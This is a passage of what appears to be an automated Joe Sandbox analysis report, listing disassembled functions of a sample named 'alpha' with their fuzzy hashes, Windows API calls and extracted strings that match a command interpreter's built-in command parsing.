                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                              • String ID:
                                              • API String ID: 346765439-0
                                              • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction ID: 535165e24c0ab43adbcea4281f78fc8b897341e21a0f76b907346d9ae0a85b8d
                                              • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction Fuzzy Hash: BB31B522A0C64286FA20A711A4903FD6395FF8DBE8F445031E94EC7BB5DF3EE501870A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Concurrency::cancel_current_taskmalloc
                                              • String ID:
                                              • API String ID: 1412018758-0
                                              • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction ID: 50b66114867919fc727482d5108bdc2b52a4a2479dbcef179588dd518c8f75d6
                                              • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction Fuzzy Hash: E4E09213F1A70796FE152B6268413F812447F1C7A8F482430DD1DC93A2EE2EB195875A
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction ID: 2a64165f4bdbdffcbaa8c868504c75ad082d581b270d40ca8e82853bc3a3922d
                                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction Fuzzy Hash: 37F03133A18642C6EB448B55F9902B8F7A1FB8DB54B589434D90E83364DF3DE485C705
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: exit
                                              • String ID:
                                              • API String ID: 2483651598-0
                                              • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction ID: f1933bb0ff546ae3d5cdf54de63c1469da23ffe4a15a48afbd0bcb51a24259db
                                              • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction Fuzzy Hash: 4BC0803270464687EB1C673135512BD55597F0D325F04543CC50BC12F1DF2DD4088609
                                              APIs
                                              • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF6EB176F97), ref: 00007FF6EB18550C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: DefaultLangUser
                                              • String ID:
                                              • API String ID: 768647712-0
                                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction ID: 3fa9d2c147a3e2985a32abcfdb9587537ac3d7fc979011ad34423492a8e25a0c
                                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction Fuzzy Hash: 52E012E3E082538AF5542A4164853F85953EB6F7B7FC44031C60D956E55D2F6841560E
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID:
                                              • API String ID: 2221118986-0
                                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction ID: 1bc13282e995fa1d41f40da5b7b34278aaf352207f34ef7ac2cc64d36ada8f4d
                                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction Fuzzy Hash: 4FF0E922B0978140EA508757B5402A95290AF8CBF4F088330EF7D87BE5DE3CD451C705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                              • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                              • API String ID: 1388555566-2647954630
                                              • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                              • Instruction ID: 6d10ca6a76f209e6c72ca180990dab1fe544812c3823253c06d13e57dad321da
                                              • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                              • Instruction Fuzzy Hash: 9FA28333A0878286E7148B65E5543F967A1FB8EBA8F448135DA0E877E4DF3EE504C706
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                              • String ID: &<|>$+: $:$:EOF$=,;$^
                                              • API String ID: 511550188-726566285
                                              • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                              • Instruction ID: df9122f05cd58c70a0934b13ddc72fef35469d079bb4b8f1757df16726814d61
                                              • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                              • Instruction Fuzzy Hash: 5C52B223A0C66286EB248B14E4003F96AE5FB4E768F544135D94EC37F4DF7EE9458B0A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp$wcschr$wcstol
                                              • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                              • API String ID: 1738779099-3004636944
                                              • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                              • Instruction ID: 94025db3cbd84410d014563e3ff8c08a9882085871ba4c610749293676bc408f
                                              • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                              • Instruction Fuzzy Hash: 54729F23B1866286EB108F65D4503FD37A1FB4976CF448035DE0D977E8DE7EA805878A
                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB197F44
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB197F5C
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB197F9E
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB197FFF
                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198020
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198036
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198061
                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198075
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1980D6
                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1980EA
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB198177
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB19819A
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB1981BD
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB1981DC
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB1981FB
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB19821A
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB198239
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198291
                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1982D7
                                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1982FB
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB19831A
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198364
                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198378
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB19839A
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1983AE
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB1983E6
                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198403
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6EB198418
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                              • API String ID: 3637805771-3100821235
                                              • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                              • Instruction ID: e61dc3e9ab0ad267ac6f3d4aa82daa97b093b21698b37997f7e9417b4085e2b3
                                              • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                              • Instruction Fuzzy Hash: A9E18333A086928AE7109F65E4003F9BAB1FB4DBA8B448131CD1E937B4DF3EA508C705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                              • String ID: %s$%s
                                              • API String ID: 3623545644-3518022669
                                              • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                              • Instruction ID: 1953e87aef4ff74749297049025d82680142fe1ac7181fef4a05e22a5f8750c6
                                              • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                              • Instruction Fuzzy Hash: D5D29133A086828AEB649B25E8503F977A1FB4976CF104135DA0E87BB4DF7EE544C706
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                              • String ID: %9d$%s
                                              • API String ID: 4286035211-3662383364
                                              • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                              • Instruction ID: 1d15df2cfa75a1f68113e848779b5be9e62925fce454f2ae67282f4e469a242e
                                              • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                              • Instruction Fuzzy Hash: 9752A333A08B828AEB648B24E9543F977A1FB8DB6CF404135DA0E877A4DF3DE5458705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcsrchr$towlower
                                              • String ID: fdpnxsatz
                                              • API String ID: 3267374428-1106894203
                                              • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                              • Instruction ID: 4a11c160f18a57e273e190087919c0d439caa29e109cd33c0250bb4f2264c592
                                              • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                              • Instruction Fuzzy Hash: 4942BE23B08B8285EB648B2595403F967A1FF4DBA8F448135DE0E977E8DF3EE8558305
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                              • String ID: DPATH
                                              • API String ID: 95024817-2010427443
                                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                              • Instruction ID: 3f93f368f9c54f789720bd6332309144ef911d0a94b0e69b2c6b5614e433e74a
                                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                              • Instruction Fuzzy Hash: 2D12A133A186C286E7649F15A4403F9B6A1FB8DB68F444135EA5E937B8DF3EE404CB05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [...]$ [..]$ [.]$...$:
                                              • API String ID: 0-1980097535
                                              • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                              • Instruction ID: 3672d3a0290ba93ee699136b5c74a0e89cc2463bf7cdf82d2b1e2238814c906a
                                              • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                              • Instruction Fuzzy Hash: 49329F73A0878286EB20DF65E5403F973A0EB4A7ACF404135DA0D876A5DF3DE549C74A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
